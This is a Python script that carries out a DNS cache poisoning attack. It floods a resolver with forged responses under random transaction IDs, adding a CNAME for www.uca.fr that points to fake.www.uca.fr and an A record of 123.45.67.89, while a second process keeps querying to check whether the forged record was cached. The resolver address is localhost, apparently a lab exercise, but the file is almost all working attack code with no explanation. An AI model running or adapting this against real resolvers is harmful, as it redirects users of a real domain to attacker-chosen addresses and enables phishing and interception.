#!/usr/bin/env python3 import multiprocessing import socket import random import time from dns import resolver from dns_utils import * class DNSServer: """Represent a DNS Server""" def __init__(self, ip: str, port: int, query_port: int): self._ip: str = ip self._port: int = port self._query_port: int = query_port @property def ip(self) -> str: return self._ip @property def port(self) -> int: return self._port @property def query_port(self) -> int: return self._query_port class Request: def __init__(self, dns: DNSServer): self._dns: DNSServer = dns def post(self, pipe, spoofed_name_server: str, address: bytes): spoofed_name_server_encoded: bytes = spoofed_name_server.encode() sok = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) name_server_encoded: bytes = pipe.recv() while True: packet_body = encode_header( True, 0, False, False, True, True, 0, 1, 2, 0, 0) packet_body += encode_question_entry( encode_name(name_server_encoded), TYPE_A, CLASS_IN) packet_body += encode_response_entry(encode_name( name_server_encoded), TYPE_CNAME, CLASS_IN, 3600, encode_name(spoofed_name_server_encoded)) packet_body += encode_response_entry(encode_name( spoofed_name_server_encoded), TYPE_A, CLASS_IN, 3600, address) while not pipe.poll(): transaction_id = random.randbytes(2) sok.sendto(transaction_id + packet_body, (self._dns.ip, self._dns.query_port,)) name_server_encoded = pipe.recv() def get(self, pipe, name_server: str): resolve = resolver.Resolver() resolve.nameservers = [self._dns.ip] resolve.port = self._dns.port while True: pipe.send(name_server.encode()) time.sleep(1) try: res = resolve.resolve(name_server) print("Found", res.response.answer) except resolver.NXDOMAIN: print("Not found") except resolver.LifetimeTimeout: print("empty / timeout") except resolver.NoAnswer: print("No answer") dns = DNSServer("127.0.0.1", 7654, 6969) req = Request(dns) cpt = 0 while True: new_address = bytes((123, 45, 67, 89)) domain = "www.uca.fr" spoofed_sub_domain = "fake" spoofed_domain = spoofed_sub_domain + "." + domain parent, child = multiprocessing.Pipe() p = multiprocessing.Process(target=req.post, args=(child, spoofed_domain, new_address)) p.start() req.get(parent, domain) p.join()